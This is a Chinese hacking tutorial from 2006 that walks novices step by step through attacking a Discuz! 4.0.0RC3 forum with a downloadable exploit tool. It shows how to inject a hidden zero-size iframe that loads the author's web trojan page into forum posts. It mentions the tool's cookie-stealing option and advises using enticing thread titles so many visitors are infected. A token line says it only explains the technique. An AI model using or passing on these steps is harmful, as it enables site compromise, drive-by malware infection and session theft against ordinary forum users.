黑客入侵实例记对Discuz论坛的入侵

　2006-11-06 20:03:01　来源：WEB开发网　　　

核心提示： 二、工欲善其事必先利其器也许繁琐的手工入侵法，不太适合菜鸟使用，黑客入侵实例记对Discuz论坛的入侵(3)，不过没有关系，笔者又为众菜鸟们量身定做了，大则电脑摇身变肉鸡！注意：本文所介绍的内容，只是告诉大家这种技术，一套“傻瓜式”入侵套餐，此套餐的宗旨就是让有无

二、工欲善其事必先利其器

也许繁琐的手工入侵法，不太适合菜鸟使用。不过没有关系，笔者又为众菜鸟们量身定做了，一套“傻瓜式”入侵套餐。此套餐的宗旨就是让有无基础的菜鸟朋友，都可以按着下文介绍的方法，来入侵高级版本的Discuz论坛。

前提条件：首先下载Discuz!4.0.0RC3漏洞利用工具（下载地址：http://blog.blackwoods.cn/up/DiscuzExploit.exe），这里下载速度较慢的朋友，不要发愁。该软件已收录到本期配套光盘中，还请读者朋友注意查收一下！

步骤1.双击下载到桌面的“漏洞利用工具”图标，弹出程序界面（如图4），然后在第二步的文本内容处，敲入手动跨站成功的地址（www. gu**y.com.cn/）。操作完毕后，单击下方“读取参数”按钮，这时需稍等片刻后，才会出现读取成功的对话框（如图5），并单击“确定”按钮即可。

图 4

图 5

小提示：本文手动入侵和工具入侵，都是采用同一个站点做列题讲解。所以在工具入侵中，有关软件界面提示，第一步需注册站点用户，这里已经在手动入侵中注册完毕，并且已经保存了COOKIES登陆，因此笔者为了避免重复讲解，跳跃了过去。如果您在漏洞站点中，还没有注册过用户的朋友，请先去注册用户，然后在执行步骤1中的方法。

步骤2.在第三步跨站内容处输入所要插入的恶意代码，如果此时你对代码知识一无所知，可以参考左边代码助手，标签中的三个按钮（如图6）。这里笔者单击“插入IFrame”按钮，会在所需的跨站内容处，出现＜iframe src='' width=0 height=0＞＜/iframe＞的字符代码。然后在＜iframe src的等于后面，填入www.fa***d.comfda.asp的网址，这是笔者事先制作好的网页后门地址。

图 6

小提示：代码助手中，“弹出对话框”按钮、“读取COOKIES”按钮以及插入“IFrame”按钮，分别代表当用户浏览过含有自己帖子的同时，1.会弹出如图3的警告对话框。2.得到浏览用户的COOKIES信息。3.在机器中加载网站木马的相关信息。

步骤3.输入完毕后，其他设置保持默认，然后单击“提交”按钮。执行进度框内，会呈现出写入站点代码的整个过程（如图7）。但是成功与否还需要看见后面的成功提示，方可判断本次写入是否成功，这里笔者等待十秒钟后，弹出了成功的“结论”（如图8）。既然恶意地址写入成功，在漏洞论坛取个诱惑力，较强的标题名称发表，从而让浏览过此帖的用户，都能重上笔者所建立的网页木马。